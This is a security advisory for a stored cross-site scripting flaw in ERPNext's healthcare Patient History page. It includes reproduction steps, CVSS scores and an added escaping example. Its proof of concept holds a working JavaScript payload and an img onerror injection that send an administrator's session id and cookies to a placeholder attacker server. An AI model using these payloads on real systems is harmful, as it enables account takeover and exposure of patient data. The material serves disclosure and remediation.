

Date: June 22, 2022


In ERPNext, versions v13.0.0-beta.13 through v13.30.0 are vulnerable to stored XSS on the Patient History page, which allows a low-privilege user to conduct an account takeover attack against a higher-privileged user who views the record.


ERPNext versions v13.0.0-beta.13 through v13.30.0 are vulnerable to stored XSS, which can lead to account takeover.

PoC Details

1. Log in to the application as a low-privilege user (for example a physician).
2. Navigate to the healthcare module and click 'patients' under 'masters'.
3. Click 'new' to create a new patient entry and fill in the details.
4. Create a file named "test.js" on the attacker host. It extracts the session id from the page markup and sends it, together with any cookies readable from script, to the attacker's server:

// Matches the "sid": "<session id>" pair that the page embeds in its markup.
var re = /\"sid\":\s\"[0-9a-zA-Z]+\"/gm;
// Pulls the bare alphanumeric session id out of the quoted value.
var te = /[0-9a-zA-Z]+/gm;

var getSID = (document.documentElement.innerHTML).match(re);
getSID = getSID[0].split(':');
getSID = getSID[1].match(te);
var url = 'http://attacker-ip:attacker-port/?sid=' + getSID;
// Exfiltrate via a script-tag request; appending the element is what actually sends it.
var script = document.createElement('script');
script.src = url + "&details=" + document.cookie;
document.body.appendChild(script);

5. Paste the malicious payload into the 'surgical history' field and click 'save' (the payload is listed under 'PoC Code' below).
6. Run an HTTP server on the attacker host (for example Python's http.server module) to receive the exfiltrated session id and to host the malicious file.
7. Open a new tab, log in to the application as 'Administrator', and navigate to 'patient history' under 'records and history' in the 'healthcare' area.
8. Search for the patient created earlier. When the patient history loads, the script stored in the 'surgical history' field executes in the administrator's browser and sends the administrator's session id to the attacker's server.

PoC Code

<img src=x onerror=this.src='http://attacker-ip:attacker-port/?c='+(((document.documentElement.innerHTML).match(/\"sid\":\s\"[0-9a-zA-Z]+\"/gm))[0].split(':')[1]).substring(2,58) >

The payload reads the session id from the page markup rather than from document.cookie, so it works even where the sid cookie is not readable from script. The substring(2,58) call skips the leading space and quote of the matched value and assumes a 56-character session id; on a deployment with a different id length the harvested value would be truncated or include the closing quote.
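The following is an added example, not code from the ERPNext or Frappe projects or from the original advisory. extractSid() reproduces what the payload above computes, run here against a constructed page fragment instead of a live instance; renderUnsafe() and renderSafe() are hypothetical renderers that contrast inserting the 'surgical history' value as raw HTML (the vulnerable pattern) with inserting it escaped. The sample page, session id and attacker URL are constructed for the example.

```javascript
// Added example (not Frappe/ERPNext code). Reproduces the PoC's session-id
// extraction and contrasts raw versus escaped rendering of a patient field.

// Same pattern as the PoC payload: matches `"sid": "<alphanumeric id>"`.
const SID_RE = /"sid":\s"[0-9a-zA-Z]+"/gm;

// Mirrors the payload: first match, split on ':', drop the leading space and
// quote, take a 56-character id. Returns null when the page has no sid.
function extractSid(html) {
  const m = html.match(SID_RE);
  if (!m) return null;
  return m[0].split(":")[1].substring(2, 58);
}

// Minimal HTML escaping for text placed in element content or quoted attributes.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable pattern (hypothetical renderer): the stored field value is
// concatenated straight into markup, so an <img onerror=...> payload runs.
function renderUnsafe(surgicalHistory) {
  return `<div class="surgical-history">${surgicalHistory}</div>`;
}

// Hardened pattern: same output shape, value escaped before insertion.
function renderSafe(surgicalHistory) {
  return `<div class="surgical-history">${escapeHtml(surgicalHistory)}</div>`;
}

// Constructed sample data; not captured from a real ERPNext instance.
const SAMPLE_SID = "0123456789abcdef".repeat(3) + "01234567"; // 56 hex chars
const SAMPLE_PAGE =
  '<script>frappe.boot = {"user":"Administrator","sid": "' + SAMPLE_SID + '"}</script>';
const PAYLOAD =
  "<img src=x onerror=this.src='http://attacker-ip:attacker-port/?c='+document.cookie>";

console.log("sid from constructed page:", extractSid(SAMPLE_PAGE));
console.log("unsafe:", renderUnsafe(PAYLOAD));
console.log("safe:  ", renderSafe(PAYLOAD));
```

Run with `node` to see the extracted id and the two renderings side by side. The escaping shown is only correct for element content and quoted attribute values; a value placed inside a script block or a URL needs context-specific encoding instead.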

Affected Environments

ERPNext versions v13.0.0-beta.13 through v13.30.0


No fixed version has been released yet.

Language: Python

Good to know:

Cross-Site Scripting (XSS)


Upgrade Version

No fix version available

Base Score (CVSS v3.x):
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): Low
Integrity (I): Low
Availability (A): None
Vector: AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N (base score 5.4, Medium, computed from the metrics above)

Base Score (CVSS v2):
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (Au): Single
Confidentiality (C): None
Integrity (I): Partial
Availability (A): None
Vector: AV:N/AC:M/Au:S/C:N/I:P/A:N (base score 3.5, computed from the metrics above)